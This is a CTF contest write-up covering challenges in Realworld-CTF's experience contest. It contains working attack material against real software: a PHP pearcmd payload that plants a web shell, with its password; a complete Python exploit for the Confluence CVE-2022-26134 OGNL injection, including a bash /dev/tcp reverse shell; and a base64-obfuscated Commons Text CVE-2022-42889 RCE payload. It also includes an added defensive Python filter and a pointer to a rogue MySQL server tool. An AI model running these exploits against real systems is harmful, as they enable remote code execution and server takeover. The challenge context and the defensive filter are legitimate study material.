[Realworld Experience Contest] -- Writeup

Realworld-CTF is very considerate: knowing that not everyone can solve challenges in the international contest, it went ahead and ran an experience contest (ps: 40% of the main contest's difficulty), so a noob like me has somewhere to play too, QEQ. I no longer have the environment to reproduce, so I'm just pasting the not-very-detailed wp I wrote during the contest. :(

Be-a-Language-Expert

Solution

The original PoC targets the path /var/www/html/, which is not writable here, so target /tmp/ directly.

POC

?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/%/<?=@eval($_REQUEST['TW']);?>+/tmp/TWe1v3.php

Set the Cookie

Cookie: think_lang=zh-cn../../../../../../../../usr/local/lib/php/pearcmd

Connect directly with AntSword: http://ip:port/index?lang=…/…/…/…/…/…/…/…/…/…/tmp/TWe1v3

shell password: TW

Once connected, just run ./readflag

Be-a-Wiki-Hacker

Solution

CVE-2022-26134: just search GitHub for an exp.

Found an exp that pops a shell:

#!/usr/bin/python3
# coding: utf-8
# cve2022-26134
# by: lxxl
import urllib.parse
import requests
import re
import sys
from bs4 import BeautifulSoup
import urllib3

urllib3.disable_warnings()
import argparse


def check(url):
    # Fingerprint the Confluence version from the login page footer
    r = requests.get(url + "/login.action", verify=False)
    if (r.status_code == 200):
        filter_version = re.findall("<span id='footer-build-information'>.*</span>", r.text)
        if (len(filter_version) >= 1):
            version = filter_version[0].split("'>")[1].split('</')[0]
            return version
        else:
            return False
    else:
        return url


def exploit(url, command):
    # OGNL injection in the request path; the command output comes back in a response header
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': '*/*',
    }
    r = requests.get(
        url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22' + command + '%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/',
        headers=headers, verify=False, allow_redirects=False)
    if (r.status_code == 302):
        return r.headers['X-Cmd-Response']
    else:
        return False


def shell():
    # Build the URL-encoded reverse-shell payload from the global ip/port
    shell = ip + "/" + port
    shell1 = "'bash','-c','bash -i >& "
    exp = shell1 + "/dev/tcp/" + shell + " 0>&1'"
    payload1 = '''${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('''
    payload2 = exp + ''').start()")}/'''
    payloads = payload1 + payload2
    s = urllib.parse.quote(payloads)
    return s


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='cve2022-26134')
    parser.add_argument('-u', '--url', help='target url', required=False)
    parser.add_argument('-c', '--command', help='command', required=False)
    parser.add_argument('-i', '--lhost', help='type', required=False)
    parser.add_argument('-p', '--lport', help='type', required=False)
    args = parser.parse_args()
    cmd = args.command
    ip = args.lhost
    port = args.lport

    # Both usage forms need at least "-u <url>" plus one more option pair
    if (len(sys.argv) < 5):
        print("USE: python3 " + sys.argv[0] + " -u https://target.com -c command")
        print("ex: python3 " + sys.argv[0] + " -u https://target.com -i your.ip -p your.port")
        sys.exit(1)

    if (sys.argv[3] == "-i"):
        target = args.url
        ip = args.lhost
        port = args.lport
        e = requests.get(target + shell(), verify=False)
        if e.status_code == 200 or e.status_code == 302:
            print("[+] exploit success")
        else:
            print("[-] exploit failed")

    else:
        target = args.url
        cmd = cmd.replace("'", "")
        version = check(target)
        print("============ GET Confluence Version ============")
        if (version):
            print("Version: " + version)
        else:
            print("Version: Not Found")
        print(exploit(target, cmd))


Listen with nc -l xxxx on your own machine or a server and pop a reverse shell.

cat /f*

ApacheCommandText

Solution

CVE-2022-42889

Java expression injection vulnerability

Using the CVE's public POC directly didn't work at first; [script, file, url, dns] were banned.

Bypass the restriction with base64Decoder.

Use the RCE to read the flag; the path is /readflag.

import java.util.Base64;

String poc = "${script:js:new java.util.Scanner(new java.lang.ProcessBuilder('/bin/sh','-c', '/readflag').start().getInputStream(), 'GBK').useDelimiter('zzc').next()}";
String exp = "${base64Decoder:" + Base64.getEncoder().encodeToString(poc.getBytes()) + "}";

${base64Decoder:JHtzY3JpcHQ6anM6bmV3IGphdmEudXRpbC5TY2FubmVyKG5ldyBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIoJy9iaW4vc2gnLCctYycsICcvcmVhZGZsYWcnKS5zdGFydCgpLmdldElucHV0U3RyZWFtKCksICdHQksnKS51c2VEZWxpbWl0ZXIoJ3p6YycpLm5leHQoKX0=}
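Added example (not part of the original writeup): a small Python check showing why a blocklist on the literal prefix names is defeated by the base64Decoder wrapper above, and how a filter that unwraps the lookup first catches it. It assumes the request value has already been URL-decoded; the real fix is upgrading Commons Text to 1.10.0, where the script, dns and url lookups are disabled by default.

```python
import base64
import re
from typing import Optional

# Lookup prefixes that Commons Text interpolated by default before 1.10.0 and that
# yield code execution, file read, SSRF or DNS exfiltration. The challenge filter
# matched these names literally, so a base64Decoder wrapper slipped past it.
DANGEROUS_PREFIXES = frozenset({"script", "file", "url", "dns"})

# ${prefix:body}; body runs to the final closing brace so nested lookups stay intact.
LOOKUP_RE = re.compile(r"\$\{\s*([A-Za-z0-9_]+)\s*:(.*)\}", re.DOTALL)


def unwrap_base64_lookups(value: str, max_depth: int = 5) -> str:
    """Peel nested ${base64Decoder:...} wrappers until a non-base64 lookup or plain
    text is reached, so the prefix that would really execute becomes visible."""
    for _ in range(max_depth):
        m = LOOKUP_RE.search(value)
        if not m or m.group(1).lower() != "base64decoder":
            return value
        try:
            value = base64.b64decode(m.group(2).strip(), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError; treat bad base64 as opaque text
            return value
    return value


def effective_prefix(value: str) -> Optional[str]:
    """Lookup prefix reachable after unwrapping, lower-cased, or None if no lookup."""
    m = LOOKUP_RE.search(unwrap_base64_lookups(value))
    return m.group(1).lower() if m else None


def naive_filter_blocks(value: str) -> bool:
    """Challenge-style check: only the outermost prefix is compared against the list."""
    m = LOOKUP_RE.search(value)
    return bool(m) and m.group(1).lower() in DANGEROUS_PREFIXES


def hardened_filter_blocks(value: str) -> bool:
    """Same blocklist, but applied to the prefix that survives base64 unwrapping."""
    return effective_prefix(value) in DANGEROUS_PREFIXES


def wrap_in_base64(value: str) -> str:
    """Wrap a lookup in ${base64Decoder:...}, the same transformation the Java snippet does."""
    return "${base64Decoder:" + base64.b64encode(value.encode()).decode() + "}"


# Constructed sample: the POC string from this writeup, wrapped as in the Java snippet.
POC = ("${script:js:new java.util.Scanner(new java.lang.ProcessBuilder('/bin/sh','-c', "
       "'/readflag').start().getInputStream(), 'GBK').useDelimiter('zzc').next()}")
WRAPPED = wrap_in_base64(POC)
```

With the constructed sample, naive_filter_blocks(WRAPPED) is False while hardened_filter_blocks(WRAPPED) is True, and the hardened check also handles a doubly wrapped payload.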

Evil MySQL Server

Solution

Use a malicious MySQL server to read files from the client:

https://github.com/Gifts/Rogue-MySql-Server